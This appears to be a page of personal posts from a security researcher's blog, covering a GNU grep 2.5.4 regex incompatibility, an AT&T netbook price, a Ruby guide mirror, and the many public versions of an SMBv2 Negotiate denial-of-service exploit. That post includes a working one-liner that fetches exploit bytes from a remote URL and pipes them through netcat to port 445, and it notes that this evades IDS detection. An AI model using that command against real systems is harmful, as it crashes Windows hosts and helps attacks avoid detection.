Hey, I'm on Metasploit, now

Just published my first Metasploit Blog Post. Whee, unauthenticated fingerprinting is my favorite and my best.

Grep 2.5.4 breaks regular expressions syntax

Backwards compatibility is for chumps, apparently. GNU Grep version 2.5.4 fundamentally changes regular expression syntax from the 2.5.3 and prior behavior. The below demonstrates the backwards breakage between 2.5.3 (on box1) and 2.5.4 (on box2).

todb@box1:~$ grep --version
GNU grep 2.5.3

Copyright (C) 1988, 1992-2002, 2004, 2005  Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

todb@box1:~$ for i in cat parrot dog monkey
> do echo $i | egrep -v '^(cat|dog)'
> done
parrot
monkey
todb@box1:~$ 

### Meanwhile, on a system with grep 2.5.4 ###

todb@box2:~$ grep --version
GNU grep 2.5.4

Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.


todb@box2:~$ for i in cat parrot dog monkey
> do echo $i | egrep -v '^(cat|dog)'
> done
cat
parrot
dog
monkey
root@box2:~$

The second fails because the special regex characters of parenthesis and pipe loose their special grouping and alteration meanings in 2.5.4. Thus, this works for 2.5.4:

todb@box2:~$ for i in cat parrot dog monkey
> do echo $i | egrep -v '^\(cat\|dog\)'
> done
parrot
monkey

But the same does not work for 2.5.3:

todb@box1:~$ for i in cat parrot dog monkey
> do echo $i | egrep -v '^\(cat\|dog\)'
> done
cat
parrot
dog
monkey
todb@box1:~$

What this all boils down to is that scripts that rely on egrep are going to break pretty horribly and somewhat mysteriously when the underlying grep package gets updated; even better, there's no common method between the two versions to ensure that you get what you expect with a regular expression that involves grouping or alteration.

Naughty, naughty, grep maintainers. Off to submit a bug report now, but since grep 2.5.4 was released way back in February, 2009, I suspect the damage is going to be somewhat unavoidable.

If you know of a way to create a regex that will work in both contexts, I'd love to hear it. Single versus double quotes don't work, so for my purposes, I have to wrap my grep functions up in a version check of grep itself. (grep --version | sed s/[^0-9]*// | head -1 for the curious)

The most implemented exploit ever: SMBv2 Negotiate DoS

Swinging by SecurityFocus' exploit list for the recent SMBv2 denial of service, I was immediately struck by the apparent silliness of listing five seperate but nearly identical implementations of the same bug. So struck, I daresay, that I could not resist writing my own stand-alone Ruby version, joking that maybe SecurityFocus will pick it up and make me famous.

Well, they did, and I did lol.

They also picked up I)ruid's much more interesting bash shell version. I thought that opening a socket straight on the command line was strictly the purview of Plan 9, but he proved me wrong.

The most "meta" version, so far, is Brent's wget-to-netcat implementation; I couldn't get it to function exactly as his tweet was written, but here's a version that Works For Me:

for i in `wget http://ur1.ca/bhe8 -q -O-|egrep 'oit.*".*"'|sed 's/s.*[<|=]//g'|sed 's/#.*//g'|sed 's/ "\(.*\)"/\1/'`;do echo -e -n $i;done|nc -w 1 127.0.0.1 445 > /dev/null

This has the added bonus of including some mild fragmentation, making IDS detection a little more squirrelly.

At any rate, I think this is all quite hilarious, and now I'm hopeful that the SMBv2 bug will be the widest-implemented DoS ever.

Update: |)ruid has published a version in Expect

Update: I've published a version in Perl

Update: Someone published a version in Java

AT&T Netbooks, only $1159

I saw an ad on TV about AT&T practically giving away Acer netbooks. Here's the link of note.

So, it's $199 for a netbook, as long as you sign a two-year contract for a DataConnect plan... and that's where they get you, as they say. $40/month, plus $199, makes this a $1159 computing device over two years. Oh, and the $40/month plan is capped at 200 mb/month. Uhhhhh yeah.

This seems to suck significantly more than I expected.

Back to Plan A, being an Android phone on T-Mobile and a tethered POS laptop. Now to figure out if their data plans are unlimited. (I've been having creeping problems with my BlackBerry 8310, which is why I'm looking at this now.)

Why's (Poignant) Guide to Ruby

Since it appears that Why the Lucky Stiff has rm'ed himself from the Internet (for the time being?), I want to make sure that Why's (Poignant) Guide to Ruby is available for general use -- namely, for my kids, when they're literate enough to learn how to program.

I had the opportunity to meet and work a little with _why in the spring of 2009. Given my very limited exposure to him, both online and in person, I'm not surprised in the least that this happened.

So, here it is, in PDF form -- it's been lurking on my various desktops for a while now, and I give it to anyone who says something like, "Gee, so what's this Ruby all about, anyway?"

I'm sure there are mirrors elsewhere as well, but this one is the only one I can count on.

Why's (Poignant) Guide to Ruby